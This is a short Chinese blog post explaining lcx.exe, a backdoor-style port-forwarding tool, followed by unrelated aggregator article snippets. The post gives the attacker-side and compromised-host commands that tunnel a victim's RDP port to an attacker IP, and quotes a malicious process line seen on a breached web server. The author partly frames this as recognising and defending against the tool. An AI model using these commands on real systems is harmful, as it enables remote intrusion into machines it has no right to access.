lcx.exe 是一支後門、遠端控制的工具

标签: Windows backdoor 後門 | 发表时间:2013-02-19 17:35 | 作者:cross
出处:http://ssorc.tw

用 virustotal 掃,說它是後門、遠端控制工具,google 上搜尋也把它跟 nc 同比,所以是類似的工具

怎麼用

攻擊端 (10.2.2.63)

lcx.exe -listen 33333 55555

肉雞端 (10.10.10.138)

lcx.exe -slave 10.2.2.63 33333 10.10.10.138 3389

可以用 mstsc 連 10.2.2.63:55555 成功遠端連線到 10.10.10.138,而不需用 10.10.10.138:3389 (前提是肉雞有開啟遠端連線功能),可以連但也要帳密才能登入

如果網站被丟到且執行了,或許在程序上會看到

"X:\RECYCLER\cmd.exe" /c X:\RECYCLER\lcx.exe -slave xx.xx.xx.xx 520 127.0.0.1 3389

是要把 IIS 應用程式的執行權限設成"僅指令碼" 嗎 ?

 

相关 [lcx exe 控制] 推荐:

EXE文件结构及读取方法

- - CSDN博客推荐文章
     EXE File英文全名executable file ,译作可执行文件,可移植可执行 (PE) 文件格式的文件,它可以加载到内存中,并由操作系统加载程序执行,是可在操作系统存储空间中浮动定位的可执行程序. 如记事本程序notepad.exe ,可以用来编辑文档,如:测试.txt双击打开notepad.exe记事本程序来进行编辑处理.

Screen2EXE小巧的屏幕录制软件 保存为高压缩高质量EXE录制格式

- Richard - 爱软件

Nginx带宽控制

- - 火丁笔记
有个老项目,通过 Squid 提供文件下载功能,利用  delay_parameters 实现带宽控制,问题是我玩不转 Squid,于是盘算着是不是能在 Nginx 里找到类似的功能. 好消息是 Nginx 提供了  limit_rate 和  limit_rate_after,举个例子来说明一下:.

Firebug控制台详解

- boho - 阮一峰的网络日志
Firebug是网页开发的利器,能够极大地提升工作效率. 我曾经翻译过一篇《Firebug入门指南》,介绍了一些基本用法. 控制台(Console)是Firebug的第一个面板,也是最重要的面板,主要作用是显示网页加载过程中产生各类信息. Firebug内置一个console对象,提供5种方法,用来显示信息.

HBase 之访问控制

- gengmao - Trend Micro CDC SPN Team
构建和运维HBase集群是一个非常有挑战性的工作. HBase凭借其在海量数据的良好的扩展性和高效的读写能力,受到越来越多公司的重视. 在公司里,HBase越来越受欢迎. 希望通过HBase读写数据的产品越来越多,在兴奋之余,头疼的问题也来了. 毕竟,作为线上的产品,我们不希望过多人随意的访问,会照成很多潜在的风险,比如误删,误操作.

当算法控制世界

- 芸窗 - Solidot
BBC的报导称,看不见的算法正在控制我们在数字世界里的互动,而糟糕的是我们正失去对这些代码的控制. 从图书和电影推荐算法,到Facebook的朋友推荐和图像标记服务,到搜索引擎,算法已经渗透到了我们生活之中. 在上月的TED大会上,算法专家Kevin Slavin描述了算法是如何塑造我们的世界,他发出警告,我们生的活正日益为算法所控制,我们正在编写我们无法理解的,可能不受控制的代码.

高并发库存控制

- - 企业架构 - ITeye博客
1、在秒杀的情况下,肯定不能如此高频率的去读写数据库,会严重造成性能问题的. 必须使用缓存,将需要秒杀的商品放入缓存中,并使用锁来处理其并发情况. 当接到用户秒杀提交订单的情况下,先将商品数量递减(加锁/解锁)后再进行其他方面的处理,处理失败在将数据递增1(加锁/解锁),否则表示交易成功. 当商品数量递减到0时,表示商品秒杀完毕,拒绝其他用户的请求.

Socket的速率控制

- - CSDN博客互联网推荐文章
做一个以精确速率向外输出数据的数据源,要完成这个目标,最基础的是:. 1、找到一种精确的计时器,在精确的时间范围内控制数据源以指定的速度向外发送数据. 2、通过对套接字选项和线程优先级的设置减少网络因素对发送速度造成的影响,从而提高发送精度,保证数据的实际发送量尽可能的达到指定的理论发送量.      针对第一个要求,通过寻找到一种时间精度达到微秒级的精确计数器来保证,在硬件支持的情况下可以通过WindowsAPI获取时钟频率以及震荡次数,通过在事件两端分别调用函数得到震荡次数的差值并结合时钟频率可以计算出精确的时间间隔,通过指定的传输速度和精确的延时可以计算出需要发送的数据量.

JDBC事务控制管理

- - 编程语言 - ITeye博客
事务指逻辑上的一组操作,组成这组操作的各个单元,要不全部成功,要不全部不成功. 例如:A——B转帐,对应于如下两条sql语句. 数据库默认事务是自动提交的,也就是发一条sql它就执行一条. 如果想多条sql放在一个事务中执行,则需要使用如下语句. 方式一:利用SQL语句管理事务. start transaction;--开启事务,这条语句之后的sql语句将处在一个事务当中,这些sql语句并不会立即执行.

为什么要控制终端?

- Alex - 爱范儿 · Beats of Bits
在写这篇文章之前,先摆出一张照片,证明我绝非空口而谈:这是手上的一部魅族 M9 和一部 MIUI 的 Nexus S ,在每个周末我都会为它俩下载最新的测试固件,体验“用互联网快速迭代的开发模式”生产出来的 ROM (手机固件). 表面上看,M9 和 MIUI 在交互体验上有相似之处,但仔细体会之后就能发现这两款产品的本质区别——前者是以“最好的消费电子产品”为目标,而后者是以“最好的移动互联网体验”为目标.